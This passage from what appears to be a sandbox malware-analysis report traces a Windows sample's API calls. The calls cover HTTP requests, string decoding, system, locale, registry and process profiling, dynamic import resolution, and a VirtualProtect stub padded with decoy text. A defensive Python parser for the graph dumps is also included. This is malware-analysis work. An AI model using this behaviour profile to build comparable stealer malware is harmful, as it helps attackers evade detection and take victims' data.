14668->14670 14669 2b52c0 25 API calls 14669->14675 14671 2b5a52 14670->14671 14673 2a1670 lstrcpy 14671->14673 14672 2b578a StrCmpCA 14672->14675 14673->14674 14674->13731 14675->14639 14675->14640 14675->14643 14675->14645 14675->14648 14675->14650 14675->14656 14675->14658 14675->14669 14675->14672 14676 2b593f StrCmpCA 14675->14676 14677 2b51f0 20 API calls 14675->14677 14678 
2ba8a0 lstrcpy 14675->14678 14676->14675 14677->14675 14678->14675 14680 2b754c 14679->14680 14681 2b7553 GetVolumeInformationA 14679->14681 14680->14681 14682 2b7591 14681->14682 14683 2b75fc GetProcessHeap RtlAllocateHeap 14682->14683 14684 2b7619 14683->14684 14685 2b7628 wsprintfA 14683->14685 14687 2ba740 lstrcpy 14684->14687 14686 2ba740 lstrcpy 14685->14686 14688 2b5da7 14686->14688 14687->14688 14688->13752 14690 2ba7a0 lstrcpy 14689->14690 14691 2a4899 14690->14691 15743 2a47b0 14691->15743 14693 2a48a5 14694 2ba740 lstrcpy 14693->14694 14695 2a48d7 14694->14695 14696 2ba740 lstrcpy 14695->14696 14697 2a48e4 14696->14697 14698 2ba740 lstrcpy 14697->14698 14699 2a48f1 14698->14699 14700 2ba740 lstrcpy 14699->14700 14701 2a48fe 14700->14701 14702 2ba740 lstrcpy 14701->14702 14703 2a490b InternetOpenA StrCmpCA 14702->14703 14704 2a4944 14703->14704 14705 2a4ecb InternetCloseHandle 14704->14705 15749 2b8b60 14704->15749 14707 2a4ee8 14705->14707 15764 2a9ac0 CryptStringToBinaryA 14707->15764 14708 2a4963 15757 2ba920 14708->15757 14711 2a4976 14713 2ba8a0 lstrcpy 14711->14713 14718 2a497f 14713->14718 14714 2ba820 2 API calls 14715 2a4f05 14714->14715 14717 2ba9b0 4 API calls 14715->14717 14716 2a4f27 codecvt 14721 2ba7a0 lstrcpy 14716->14721 14719 2a4f1b 14717->14719 14722 2ba9b0 4 API calls 14718->14722 14720 2ba8a0 lstrcpy 14719->14720 14720->14716 14733 2a4f57 14721->14733 14723 2a49a9 14722->14723 14724 2ba8a0 lstrcpy 14723->14724 14725 2a49b2 14724->14725 14726 2ba9b0 4 API calls 14725->14726 14727 2a49d1 14726->14727 14728 2ba8a0 lstrcpy 14727->14728 14729 2a49da 14728->14729 14730 2ba920 3 API calls 14729->14730 14731 2a49f8 14730->14731 14732 2ba8a0 lstrcpy 14731->14732 14734 2a4a01 14732->14734 14733->13755 14735 2ba9b0 4 API calls 14734->14735 14736 2a4a20 14735->14736 14737 2ba8a0 lstrcpy 14736->14737 14738 2a4a29 14737->14738 14739 2ba9b0 4 API calls 14738->14739 14740 2a4a48 14739->14740 14741 2ba8a0 lstrcpy 14740->14741 14742 2a4a51 14741->14742 
14743 2ba9b0 4 API calls 14742->14743 14744 2a4a7d 14743->14744 14745 2ba920 3 API calls 14744->14745 14746 2a4a84 14745->14746 14747 2ba8a0 lstrcpy 14746->14747 14748 2a4a8d 14747->14748 14749 2a4aa3 InternetConnectA 14748->14749 14749->14705 14750 2a4ad3 HttpOpenRequestA 14749->14750 14752 2a4b28 14750->14752 14753 2a4ebe InternetCloseHandle 14750->14753 14754 2ba9b0 4 API calls 14752->14754 14753->14705 14755 2a4b3c 14754->14755 14756 2ba8a0 lstrcpy 14755->14756 14757 2a4b45 14756->14757 14758 2ba920 3 API calls 14757->14758 14759 2a4b63 14758->14759 14760 2ba8a0 lstrcpy 14759->14760 14761 2a4b6c 14760->14761 14762 2ba9b0 4 API calls 14761->14762 14763 2a4b8b 14762->14763 14764 2ba8a0 lstrcpy 14763->14764 14765 2a4b94 14764->14765 14766 2ba9b0 4 API calls 14765->14766 14767 2a4bb5 14766->14767 14768 2ba8a0 lstrcpy 14767->14768 14769 2a4bbe 14768->14769 14770 2ba9b0 4 API calls 14769->14770 14771 2a4bde 14770->14771 14772 2ba8a0 lstrcpy 14771->14772 14773 2a4be7 14772->14773 14774 2ba9b0 4 API calls 14773->14774 14775 2a4c06 14774->14775 14776 2ba8a0 lstrcpy 14775->14776 14777 2a4c0f 14776->14777 14778 2ba920 3 API calls 14777->14778 14779 2a4c2d 14778->14779 14780 2ba8a0 lstrcpy 14779->14780 14781 2a4c36 14780->14781 14782 2ba9b0 4 API calls 14781->14782 14783 2a4c55 14782->14783 14784 2ba8a0 lstrcpy 14783->14784 14785 2a4c5e 14784->14785 14786 2ba9b0 4 API calls 14785->14786 14787 2a4c7d 14786->14787 14788 2ba8a0 lstrcpy 14787->14788 14789 2a4c86 14788->14789 14790 2ba920 3 API calls 14789->14790 14791 2a4ca4 14790->14791 14792 2ba8a0 lstrcpy 14791->14792 14793 2a4cad 14792->14793 14794 2ba9b0 4 API calls 14793->14794 14795 2a4ccc 14794->14795 14796 2ba8a0 lstrcpy 14795->14796 14797 2a4cd5 14796->14797 14798 2ba9b0 4 API calls 14797->14798 14799 2a4cf6 14798->14799 14800 2ba8a0 lstrcpy 14799->14800 14801 2a4cff 14800->14801 14802 2ba9b0 4 API calls 14801->14802 14803 2a4d1f 14802->14803 14804 2ba8a0 lstrcpy 14803->14804 14805 2a4d28 14804->14805 14806 2ba9b0 4 
API calls 14805->14806 14807 2a4d47 14806->14807 14808 2ba8a0 lstrcpy 14807->14808 14809 2a4d50 14808->14809 14810 2ba920 3 API calls 14809->14810 14811 2a4d6e 14810->14811 14812 2ba8a0 lstrcpy 14811->14812 14813 2a4d77 14812->14813 14814 2ba740 lstrcpy 14813->14814 14815 2a4d92 14814->14815 14816 2ba920 3 API calls 14815->14816 14817 2a4db3 14816->14817 14818 2ba920 3 API calls 14817->14818 14819 2a4dba 14818->14819 14820 2ba8a0 lstrcpy 14819->14820 14821 2a4dc6 14820->14821 14822 2a4de7 lstrlen 14821->14822 14823 2a4dfa 14822->14823 14824 2a4e03 lstrlen 14823->14824 15763 2baad0 14824->15763 14826 2a4e13 HttpSendRequestA 14827 2a4e32 InternetReadFile 14826->14827 14828 2a4e67 InternetCloseHandle 14827->14828 14833 2a4e5e 14827->14833 14830 2ba800 14828->14830 14830->14753 14831 2ba9b0 4 API calls 14831->14833 14832 2ba8a0 lstrcpy 14832->14833 14833->14827 14833->14828 14833->14831 14833->14832 15770 2baad0 14834->15770 14836 2b17c4 StrCmpCA 14837 2b17cf ExitProcess 14836->14837 14839 2b17d7 14836->14839 14838 2b19c2 14838->13757 14839->14838 14840 2b18cf StrCmpCA 14839->14840 14841 2b18ad StrCmpCA 14839->14841 14842 2b187f StrCmpCA 14839->14842 14843 2b185d StrCmpCA 14839->14843 14844 2b1913 StrCmpCA 14839->14844 14845 2b1932 StrCmpCA 14839->14845 14846 2b18f1 StrCmpCA 14839->14846 14847 2b1951 StrCmpCA 14839->14847 14848 2b1970 StrCmpCA 14839->14848 14849 2ba820 lstrlen lstrcpy 14839->14849 14840->14839 14841->14839 14842->14839 14843->14839 14844->14839 14845->14839 14846->14839 14847->14839 14848->14839 14849->14839 14851 2ba7a0 lstrcpy 14850->14851 14852 2a5979 14851->14852 14853 2a47b0 2 API calls 14852->14853 14854 2a5985 14853->14854 14855 2ba740 lstrcpy 14854->14855 14856 2a59ba 14855->14856 14857 2ba740 lstrcpy 14856->14857 14858 2a59c7 14857->14858 14859 2ba740 lstrcpy 14858->14859 14860 2a59d4 14859->14860 14861 2ba740 lstrcpy 14860->14861 14862 2a59e1 14861->14862 14863 2ba740 lstrcpy 14862->14863 14864 2a59ee InternetOpenA StrCmpCA 14863->14864 14865 
[Execution graph, continued. The interactive node/edge list is not reproduced; the API-bearing nodes it contains are listed here by address, grouped by API family.]

WinINet (HTTP):
• 2a51fd InternetOpenA StrCmpCA; 2a5329 InternetConnectA; 2a5359 HttpOpenRequestA; 2a58b7, 2a58c4 InternetCloseHandle
• 2a5b7c InternetConnectA; 2a5bac HttpOpenRequestA; 2a5e70, 2a5eae, 2a5ed7, 2a5ef0, 2a5f1a lstrlen; 2a5e81 lstrlen GetProcessHeap RtlAllocateHeap; 2a5f2a HttpSendRequestA; 2a5f35 InternetReadFile; 2a5f6a, 2a5fb6, 2a5fc3 InternetCloseHandle
• 2a5009 InternetOpenUrlA; 2a502a InternetReadFile; 2a50a0 InternetCloseHandle InternetCloseHandle
• 2a4838 lstrlen; 2a4848 InternetCrackUrlA

CryptoAPI string conversion:
• 2a9af9 LocalAlloc; 2a9b14 CryptStringToBinaryA; 2a9b39 LocalFree
• 2b8ead CryptBinaryToStringA; 2b8ece GetProcessHeap RtlAllocateHeap; 2b8ef4 codecvt; 2b8f05 CryptBinaryToStringA

Process, system, locale and hardware queries:
• 2b77c0 GetCurrentProcess IsWow64Process
• 2b7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA
• 2b7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation; 2b7a9a wsprintfA
• 2b7b00 GetUserDefaultLocaleName; 2b8d20 LocalAlloc CharToOemW
• 2b7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList; 2b7c46 GetLocaleInfoA; 2b7d1e LocalFree
• 2b7d80 GetSystemPowerStatus
• 2b207e GetCurrentProcessId; 2b9470 OpenProcess; 2b9493 GetModuleFileNameExA CloseHandle
• 2b7ed0 GetSystemInfo wsprintfA
• 2b7fb9 GetLogicalProcessorInformationEx; 2b7fd8 GetLastError; 2b8084 wsprintfA
• 2b8100 GetProcessHeap RtlAllocateHeap; 2b814d GlobalMemoryStatusEx; 2b8163 __aulldiv; 2b819b wsprintfA
• 2b87fb GetProcessHeap RtlAllocateHeap wsprintfA
• 2b8b82 GetSystemTime
• 2b86bc CreateToolhelp32Snapshot Process32First; 2b86e8 Process32Next; 2b875d CloseHandle

Registry queries:
• 2b7690 GetProcessHeap RtlAllocateHeap; 2b76c6 RegOpenKeyExA; 2b76e7 RegQueryValueExA; 2b7704 RegCloseKey
• 2b7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA; 2b7765 RegQueryValueExA; 2b7780 RegCloseKey
• 2b7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA; 2b7e68 RegQueryValueExA; 2b7e8e RegCloseKey
• 2b835c RegOpenKeyExA; 2b83f8 RegEnumKeyExA; 2b843f wsprintfA RegOpenKeyExA; 2b8485 RegCloseKey RegCloseKey; 2b84c1, 2b856e RegQueryValueExA; 2b84fa lstrlen; 2b8601, 2b8613 RegCloseKey

Memory and module handling:
• 2a668f, 2a6743 VirtualAlloc; 2a6a09 LoadLibraryA; 2a6ba8 GetProcAddress; 2a6ee6 VirtualFree; 2a6f26 FreeLibrary
• 2b89f9 GetProcessHeap HeapFree; 2b8a10 GetProcessHeap RtlAllocateHeap

String helpers:
• 2a1590, 2ba740, 2ba7a0, 2ba8a0 lstrcpy; 2ba820 lstrlen lstrcpy; 2ba968 lstrcpy lstrcat; 2ba9b0 lstrcpy lstrlen lstrcpy lstrcat; 2a5192, 2b265a lstrlen; 2a58d9, 2a601f codecvt
• StrCmpCA at 2b0799, 2b0865, 2b099c, 2b0e27, 2b0e67, 2b0ea4, 2b0fb2

Subroutines the graph shows only with a call count: 2a47b0 (2 API calls), 2a9ac0 (4), 2b7500 (6), 2b7850 (3), 2b78e0 (3), 2b8b60 (3), 2b8de0 (2), 2b8320 (17), 2ba920 (3)

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  Basic blocks (id: address range, calls):
                  • 660: 2b9860-2b9874, call 2b9750
                  • 663: 2b987a-2b9a8e, call 2b9780, GetProcAddress * 21
                  • 664: 2b9a93-2b9af2, LoadLibraryA * 5
                  • 666: 2b9b0d-2b9b14
                  • 667: 2b9af4-2b9b08, GetProcAddress
                  • 669: 2b9b46-2b9b4d
                  • 670: 2b9b16-2b9b41, GetProcAddress * 2
                  • 671: 2b9b68-2b9b6f
                  • 672: 2b9b4f-2b9b63, GetProcAddress
                  • 673: 2b9b89-2b9b90
                  • 674: 2b9b71-2b9b84, GetProcAddress
                  • 675: 2b9b92-2b9bbc, GetProcAddress * 2
                  • 676: 2b9bc1-2b9bc2
                  Edges: 660->663, 660->664, 663->664, 664->666, 664->667, 666->669, 666->670, 667->666, 669->671, 669->672, 670->669, 671->673, 671->674, 672->671, 673->675, 673->676, 674->673, 675->676
                  APIs
                  • GetProcAddress.KERNEL32(76210000,00D51770), ref: 002B98A1
                  • GetProcAddress.KERNEL32(76210000,00D51788), ref: 002B98BA
                  • GetProcAddress.KERNEL32(76210000,00D516E0), ref: 002B98D2
                  • GetProcAddress.KERNEL32(76210000,00D516B0), ref: 002B98EA
                  • GetProcAddress.KERNEL32(76210000,00D51698), ref: 002B9903
                  • GetProcAddress.KERNEL32(76210000,00D58B78), ref: 002B991B
                  • GetProcAddress.KERNEL32(76210000,00D45428), ref: 002B9933
                  • GetProcAddress.KERNEL32(76210000,00D45448), ref: 002B994C
                  • GetProcAddress.KERNEL32(76210000,00D51650), ref: 002B9964
                  • GetProcAddress.KERNEL32(76210000,00D517B8), ref: 002B997C
                  • GetProcAddress.KERNEL32(76210000,00D51668), ref: 002B9995
                  • GetProcAddress.KERNEL32(76210000,00D517D0), ref: 002B99AD
                  • GetProcAddress.KERNEL32(76210000,00D45508), ref: 002B99C5
                  • GetProcAddress.KERNEL32(76210000,00D515C0), ref: 002B99DE
                  • GetProcAddress.KERNEL32(76210000,00D51500), ref: 002B99F6
                  • GetProcAddress.KERNEL32(76210000,00D45648), ref: 002B9A0E
                  • GetProcAddress.KERNEL32(76210000,00D51530), ref: 002B9A27
                  • GetProcAddress.KERNEL32(76210000,00D51548), ref: 002B9A3F
                  • GetProcAddress.KERNEL32(76210000,00D45528), ref: 002B9A57
                  • GetProcAddress.KERNEL32(76210000,00D51830), ref: 002B9A70
                  • GetProcAddress.KERNEL32(76210000,00D453A8), ref: 002B9A88
                  • LoadLibraryA.KERNEL32(00D51848,?,002B6A00), ref: 002B9A9A
                  • LoadLibraryA.KERNEL32(00D51860,?,002B6A00), ref: 002B9AAB
                  • LoadLibraryA.KERNEL32(00D51878,?,002B6A00), ref: 002B9ABD
                  • LoadLibraryA.KERNEL32(00D51890,?,002B6A00), ref: 002B9ACF
                  • LoadLibraryA.KERNEL32(00D518A8,?,002B6A00), ref: 002B9AE0
                  • GetProcAddress.KERNEL32(75B30000,00D517E8), ref: 002B9B02
                  • GetProcAddress.KERNEL32(751E0000,00D51800), ref: 002B9B23
                  • GetProcAddress.KERNEL32(751E0000,00D51818), ref: 002B9B3B
                  • GetProcAddress.KERNEL32(76910000,00D59058), ref: 002B9B5D
                  • GetProcAddress.KERNEL32(75670000,00D45668), ref: 002B9B7E
                  • GetProcAddress.KERNEL32(77310000,00D58C38), ref: 002B9B9F
                  • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 002B9BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 002B9BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: ecbc276302ffd0b73b0971b02ca6b975f0f071cc8515504d05a1c1377ab5474d
                  • Instruction ID: 0f20b7a6b5f7ebdc5d6d9115eec3f8b214e4ca0ddac888bc1cf975c2330b1b23
                  • Opcode Fuzzy Hash: ecbc276302ffd0b73b0971b02ca6b975f0f071cc8515504d05a1c1377ab5474d
                  • Instruction Fuzzy Hash: 61A17EB95002C09FC354EFA8EDC89567BF9F74C301705853EE605CB266D639B8A5CB1A
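The graph dumps in this report (the execution graph and the per-function control-flow graphs) are exported as flat token streams: a node is `id address [labels...]`, an edge is `a->b`, and a repeated call is abbreviated `Name * N`. The Python below is an added example and is not part of the Joe Sandbox report or of the sample; it parses that token stream, recovers the API calls reachable from an entry block in execution order, totals calls per API, and reports loops (back edges), which is how an analyst can tell a straight-line import resolver such as 2b9860 apart from a looping stub such as 2a45c0, or spot the InternetReadFile read loop in the execution graph. The three embedded inputs are copied from this report's own dumps (the control-flow graphs of 2b9860 and 2a45c0, and an excerpt of the execution graph around 2a5f2a); the function names and the token-layout assumptions (decimal node ids, addresses of 6 to 8 hex digits or a range of them) are mine and are only checked against this report's format.

```python
"""Parse Joe Sandbox graph dumps into queryable nodes/edges. Added example; the
inputs below are copied from this report's own graph dumps."""
import re
from collections import defaultdict

# Copied from the report: control-flow graph of the import resolver at 2b9860.
CFG_RESOLVER = (
    "control_flow_graph 660 2b9860-2b9874 call 2b9750 663 2b987a-2b9a8e call 2b9780 "
    "GetProcAddress * 21 660->663 664 2b9a93-2b9af2 LoadLibraryA * 5 660->664 663->664 "
    "666 2b9b0d-2b9b14 664->666 667 2b9af4-2b9b08 GetProcAddress 664->667 669 2b9b46-2b9b4d "
    "666->669 670 2b9b16-2b9b41 GetProcAddress * 2 666->670 667->666 671 2b9b68-2b9b6f "
    "669->671 672 2b9b4f-2b9b63 GetProcAddress 669->672 670->669 673 2b9b89-2b9b90 671->673 "
    "674 2b9b71-2b9b84 GetProcAddress 671->674 672->671 675 2b9b92-2b9bbc GetProcAddress * 2 "
    "673->675 676 2b9bc1-2b9bc2 673->676 674->673 675->676"
)
# Copied from the report: control-flow graph of the stub at 2a45c0.
CFG_STUB = (
    "control_flow_graph 764 2a45c0-2a4695 RtlAllocateHeap 781 2a46a0-2a46a6 764->781 "
    "782 2a474f-2a47a9 VirtualProtect 781->782 783 2a46ac-2a474a 781->783 783->781"
)
# Excerpt assembled from the report's execution graph around the HTTP request at
# 2a5f2a (node 14914 is referenced here but defined outside the excerpt).
EXEC_EXCERPT = (
    "14985 2a5f1a lstrlen 15773 2baad0 14985->15773 14987 2a5f2a HttpSendRequestA "
    "14988 2a5f35 InternetReadFile 14987->14988 14989 2a5f6a InternetCloseHandle "
    "14988->14989 14993 2a5f61 14988->14993 14989->14914 15773->14987 "
    "14991 2ba9b0 4 API calls 14991->14993 14992 2ba8a0 lstrcpy 14992->14993 "
    "14993->14988 14993->14989 14993->14991 14993->14992"
)

# Assumed token layout (holds for this report's dumps): decimal node ids, addresses of
# 6-8 hex digits or a range of them, edges written a->b, anything else is a node label.
ADDR = re.compile(r"[0-9a-f]{6,8}(?:-[0-9a-f]{6,8})?")
EDGE = re.compile(r"(\d+)->(\d+)")
NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
NOISE = {"API", "calls", "call"}  # "4 API calls" / "call 2b9750" are summaries, not APIs


def parse_graph(text):
    """Return ({id: {"addr": str, "labels": [str]}}, [(src, dst), ...])."""
    toks, nodes, edges, cur, i = text.split(), {}, [], None, 0
    while i < len(toks):
        t, m = toks[i], EDGE.fullmatch(toks[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            cur = None
        elif t.isdigit() and i + 1 < len(toks) and ADDR.fullmatch(toks[i + 1]):
            cur = int(t)
            nodes[cur] = {"addr": toks[i + 1], "labels": []}
            i += 1                      # consume the address token too
        elif cur is not None:           # a stray prefix like "control_flow_graph" is dropped
            nodes[cur]["labels"].append(t)
        i += 1
    return nodes, edges


def api_calls(node):
    """[(api, count)] from a node's labels, expanding the 'Name * N' shorthand."""
    labels, out, i = node["labels"], [], 0
    while i < len(labels):
        t = labels[i]
        if NAME.fullmatch(t) and t not in NOISE:
            n = 1
            if i + 2 < len(labels) and labels[i + 1] == "*" and labels[i + 2].isdigit():
                n, i = int(labels[i + 2]), i + 2
            out.append((t, n))
        i += 1
    return out


def successors(edges):
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    return succ


def api_sequence(nodes, edges, start):
    """Breadth-first from start: [(addr, [(api, count)])] for each API-bearing node reached."""
    succ, seen, queue, out = successors(edges), {start}, [start], []
    while queue:
        n = queue.pop(0)
        if n in nodes and api_calls(nodes[n]):
            out.append((nodes[n]["addr"], api_calls(nodes[n])))
        for m in succ[n]:
            if m not in seen:
                seen.add(m)
                queue.append(m)
    return out


def call_counts(nodes):
    """Total calls per API over the whole dump (28 GetProcAddress + 5 LoadLibraryA for 2b9860)."""
    totals = defaultdict(int)
    for node in nodes.values():
        for api, n in api_calls(node):
            totals[api] += n
    return dict(totals)


def back_edges(edges, start):
    """Edges that close a cycle on a depth-first walk from start, i.e. the loops."""
    succ, on_stack, done, found = successors(edges), set(), set(), []

    def visit(n):
        on_stack.add(n)
        for m in succ[n]:
            if m in on_stack:
                found.append((n, m))
            elif m not in done:
                visit(m)
        on_stack.discard(n)
        done.add(n)

    visit(start)
    return found


if __name__ == "__main__":
    for name, dump, entry in (("2b9860", CFG_RESOLVER, 660), ("2a45c0", CFG_STUB, 764),
                              ("exec", EXEC_EXCERPT, 14985)):
        nodes, edges = parse_graph(dump)
        print(name, api_sequence(nodes, edges, entry), call_counts(nodes), back_edges(edges, entry))
```

Run on the 2b9860 graph the sequence is 21 GetProcAddress calls, then 5 LoadLibraryA calls, then the remaining single and paired GetProcAddress blocks, with no back edge; on 2a45c0 it is RtlAllocateHeap, a 781/783 cycle, then VirtualProtect; on the execution-graph excerpt the back edge 14993->14988 is the loop around InternetReadFile. The multiplier handling matters because the dump writes `GetProcAddress * 21` for a block rather than repeating the name, so a naive token count would under-report by a factor of twenty.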

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  Basic blocks (id: address range, calls):
                  • 764: 2a45c0-2a4695, RtlAllocateHeap
                  • 781: 2a46a0-2a46a6
                  • 782: 2a474f-2a47a9, VirtualProtect
                  • 783: 2a46ac-2a474a
                  Edges: 764->781, 781->782, 781->783, 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002A460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 002A479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (one string, 25 reference sites in this function): 002A45C7, 002A45D2, 002A45DD, 002A45E8, 002A45F3, 002A4617, 002A4622, 002A462D, 002A4643, 002A4657, 002A4662, 002A466D, 002A4678, 002A4683, 002A46AC, 002A46B7, 002A46CD, 002A46D8, 002A4713, 002A471E, 002A4734, 002A473F, 002A474F, 002A475A, 002A477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A46C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002A4638
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by 